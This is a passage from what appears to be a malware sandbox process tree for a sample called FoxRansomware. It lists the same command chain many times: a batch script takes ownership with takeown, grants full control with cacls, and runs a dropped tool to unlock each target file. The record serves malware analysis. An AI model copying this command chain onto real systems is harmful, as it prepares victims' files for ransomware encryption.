    - Suspicious use of AdjustPrivilegeToken
    PID:6888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "AssemblyList_4_extended.xml" -nobanner
    3⤵
    PID:6296
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "AssemblyList_4_extended.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:6340
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:5812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:6820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:6364
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "watermark.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:6644
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:6408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5300
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:6480
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""
  2⤵
  PID:532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
    3⤵
    PID:5280
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:5816
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""
  2⤵
  PID:6176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C
    3⤵
    PID:6016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
    3⤵
    PID:5476
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:5144
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""
  2⤵
  PID:6012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C
    3⤵
    PID:5384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
    3⤵
    PID:6552
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:6696
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:4004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:5600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:6852
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      Executes dropped EXE
      PID:6484
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.8755286a-b525-47e2-9314-08a5bb2bcfa8.1.etl""
  2⤵
  PID:4184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.8755286a-b525-47e2-9314-08a5bb2bcfa8.1.etl" /E /G Admin:F /C
    3⤵
    PID:4428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.8755286a-b525-47e2-9314-08a5bb2bcfa8.1.etl"
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MoUsoCoreWorker.8755286a-b525-47e2-9314-08a5bb2bcfa8.1.etl" -nobanner
    3⤵
    PID:5284
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MoUsoCoreWorker.8755286a-b525-47e2-9314-08a5bb2bcfa8.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:7164
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin""
  2⤵
  PID:5192
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin" /E /G Admin:F /C
    3⤵
    PID:7156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin"
    3⤵
    PID:5452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000008.bin" -nobanner
    3⤵
    PID:5884
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000008.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:5696
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5612
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin""
  2⤵
  PID:1272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin" /E /G Admin:F /C
    3⤵
    PID:6688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin"
    3⤵
    PID:6736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000000M.bin" -nobanner
    3⤵
    PID:2100
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000000M.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:6188
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin""
  2⤵
  PID:5940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin" /E /G Admin:F /C
    3⤵
    PID:6992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin"
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000010.bin" -nobanner
    3⤵
    PID:316
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000010.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:4760
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin""
  2⤵
  PID:1548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin" /E /G Admin:F /C
    3⤵
    PID:5628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin"
    3⤵
    PID:3136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000009.bin" -nobanner
    3⤵
    PID:1812
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000009.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:3728
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin""
  2⤵
  PID:1312
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin" /E /G Admin:F /C
    3⤵
    PID:6596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin"
    3⤵
    PID:6712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000000N.bin" -nobanner
    3⤵
    PID:6512
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000000N.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:6440
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin""
  2⤵
  PID:7044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin" /E /G Admin:F /C
    3⤵
    PID:6952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin"
    3⤵
    PID:6184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000011.bin" -nobanner
    3⤵
    PID:4680
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000011.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:4244
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin""
  2⤵
  PID:6472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin" /E /G Admin:F /C
    3⤵
    PID:7076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin"
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000054.bin" -nobanner
    3⤵
    PID:6752
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000054.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:6312
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin""
  2⤵
  PID:4724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin" /E /G Admin:F /C
    3⤵
    PID:6384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin"
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000006D.bin" -nobanner
    3⤵
    PID:6888
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000006D.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:5272
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin""
  2⤵
  PID:6928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin" /E /G Admin:F /C
    3⤵
    PID:3184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin"
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000006N.bin" -nobanner
    3⤵
    PID:5276
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000006N.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:6364
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin""
  2⤵
  PID:5964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin" /E /G Admin:F /C
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin"
    3⤵
    PID:5212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000070.bin" -nobanner
    3⤵
    PID:5360
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000070.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:6480
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin""
  2⤵
  PID:7084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin" /E /G Admin:F /C
    3⤵
    PID:7000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin"
    3⤵
    PID:5376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000007A.bin" -nobanner
    3⤵
    PID:5292
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000007A.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:5944
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin""
  2⤵
  PID:5708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin" /E /G Admin:F /C
    3⤵
    PID:6680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin"
    3⤵
    PID:6016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000007K.bin" -nobanner
    3⤵
    PID:5480
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000007K.bin" -nobanner
      4⤵
      PID:6608
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin""
  2⤵
  PID:3756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin" /E /G Admin:F /C
    3⤵
    PID:6904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin"
    3⤵
    - Modifies file permissions
    PID:6692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000007V.bin" -nobanner
    3⤵
    PID:6912
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000007V.bin" -nobanner
      4⤵
      PID:2184
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin""
  2⤵
  PID:6836
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin" /E /G Admin:F /C
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin"
    3⤵
    PID:6000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000089.bin" -nobanner
    3⤵
    PID:5876
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000089.bin" -nobanner
      4⤵
      PID:7024
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin""
  2⤵
  PID:5648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin" /E /G Admin:F /C
    3⤵
    PID:7136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin"
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000008J.bin" -nobanner
    3⤵
    PID:5288
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000008J.bin" -nobanner
      4⤵
      PID:7140
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin""
  2⤵
  PID:6092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin" /E /G Admin:F /C
    3⤵
    PID:5636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin"
    3⤵
    PID:5304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000008V.bin" -nobanner
    3⤵
    PID:5680
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000008V.bin" -nobanner
      4⤵
      PID:5192
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5340
- C:\Windows\SysWOW64\cmd.exe
